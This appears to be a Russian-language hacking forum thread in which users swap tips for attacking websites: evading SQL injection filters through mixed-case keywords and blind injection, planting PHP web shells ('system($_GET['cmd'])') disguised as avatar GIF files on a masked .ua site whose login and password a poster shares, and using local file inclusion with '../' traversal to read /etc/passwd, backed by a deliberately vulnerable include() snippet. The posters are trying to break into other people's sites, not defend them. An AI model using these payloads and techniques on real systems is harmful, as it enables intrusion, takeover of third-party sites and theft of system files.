Вопросы по уязвимостям

[skM]

Цитата:

Сообщение от nomad

Попробуй разные регистры, например, uNIon+sElEct

пробовал, толку - 0

еще варианты есть?

[SeNaP]

Возможно ли как нибудть раскрыть пути к WWW имея доступ только к БД?

[Jokester]

skM
Sweb? Пробуй постом, пробуй без union (как слепую) у них отличаются настройки на разных серваках, может прокатить, а может и нет.

[mailbrush]

Цитата:

Сообщение от Cross

Так что, в моем случае это всё - финиш?

Нет, вы немного не так все делаете, пересмотрите мое сообщение...

[skM]

Цитата:

Сообщение от Jokester

skM
Sweb? Пробуй постом, пробуй без union (как слепую) у них отличаются настройки на разных серваках, может прокатить, а может и нет.

нет, не sweb, с ним я уже сталкивался.
да, она слепая, но без юниона тоже никак.

Цитата:

select+from

<- вот здесь уже фильтрует. но в

Цитата:

from+select

все ок. я все-таки думаю на последовательность..

например при

Цитата:

select123454321from

тоже фильтрует.

[Cross]

Цитата:

Сообщение от mailbrush

Нет, вы немного не так все делаете, пересмотрите мое сообщение...

Я не силен в жаргоне, что значит проинклудь? Но тем не менее не получается...

Если кому-нибудь не сложно сделать, так сказать, правильно, то что mailbrush объяснил, то вот:

Цитата:

site:***.ua
login:qwerty
pass:123456

В выпадающем списке аватарок, в самом низу, есть new.gif и xd.gif - вот их содержимое:

Цитата:

new.gif - <?php system($_GET['cmd']);?>
xd.gif - <?php system($_GET[cmd]);?>
разница лишь в кавычках

[Raz0r]

Цитата:

Сообщение от Cross

Я не силен в жаргоне, что значит проинклудь?

"проинклудить" значит воспользоваться уязвимостью типа PHP Local / Remote Inclusion. Я уже в третий раз пишу: в конкретно этом сайте нет этой уязвимости, и я не понимаю, чем хочет помочь товарищ mailbrush. Если просто показать как работает инклуд, то это надо делать на работающем примере.

[Cross]

Добрый вечер.

Вопрос по php-include:
Не могу разобраться с конструкцией вида index.php?page=../../etc/passwd
Отчего зависит количество "../../"? Количество этих комбинаций следует перебирать от больше к меньшему? (к примеру наваять их штук 20 и по одной удалять). Есть тулза по автоматизации этого процесса? И кстати, т.к. фф конвертирует нулл-байт после каждого нажатия энтера...вообщем что тут посоветуете?
В теме "php-include", в постах юзеров, после знака = идут как .. так и /, т.е. инклуд начинается как с того так и сэтого символа, вперемешку...отчего это зависит?
Или есть мануал отвечающий на эти вопросы? (за целый день такого не нашел)

[Nightmare]

Цитата:

Сообщение от Cross

Добрый вечер.

Вопрос по php-include:
Не могу разобраться с конструкцией вида index.php?page=../../etc/passwd
Отчего зависит количество "../../"? Количество этих комбинаций следует перебирать от больше к меньшему? (к примеру наваять их штук 20 и по одной удалять). Есть тулза по автоматизации этого процесса? И кстати, т.к. фф конвертирует нулл-байт после каждого нажатия энтера...вообщем что тут посоветуете?
В теме "php-include", в постах юзеров, после знака = идут как .. так и /, т.е. инклуд начинается как с того так и сэтого символа, вперемешку...отчего это зависит?
Или есть мануал отвечающий на эти вопросы? (за целый день такого не нашел)

конструкции вида ../ обозначают каталоги (директории, папки и так далее) конструкция ./ в php обозначает текущий каталог. конструкция ../ обозначает переход к предыдущему каталогу минуя его имя.
то есть директория скажем /home/dir1/dir2/
используя ../ ты переместишься /home/dir1/ используя ../../ ты переместишься /home/ и так далее.

То есть путь на сайте:
/home/war/dir/www/site/www2/index.php
а пароли тут:
/home/etc/passwd (passwd - кстати файл, его часто путают с директорией)
тогда делаем так: /index.php?lol=../../../../../etc/passwd
Используем 5 пропусков директорий, и мы находимся в /home/ а далее поднимаемся в /ets/

Количество этих комбинаций на каждом сайте индивидуально, ибо у каждого своя структура директорий, у кого то больше, у кого то меньше. но не так уж и много. это вам не колонки к скулям =)))

И да, нул байт так же пашет не везде, потому что требует выключенных волшебных ковычек, а по умолчанию в конфиге они заразы включены во первых, а во вторых это небезопасно и глупо.

[M.W.N.N.]

Цитата:

Сообщение от Nightmare

Количество этих комбинаций на каждом сайте индивидуально, ибо у каждого своя структура директорий, у кого то больше, у кого то меньше. но не так уж и много. это вам не колонки к скулям =)))

Код:

laptop:~$ cd /var/www
laptop:/var/www$ cd ../../../../../../etc/
laptop:/etc$

test.php

PHP код:

<?php
$lol=$_GET['name'];
include("$lol");
?>

in.php

PHP код:

<?php
echo "sdfsdf";
?>

http://127.0.0.1/test.php?name=in.php
Все гуд
путь до скрипта in.php - /var/www
Пробуем http://127.0.0.1/test.php?name=../../../../../../../../../../../../../../../etc/passwd
И все гуд.

Какая разница сколько там будет переходов в каталог выше, все равно выше / вы не попадете?!
Ну путаем народ!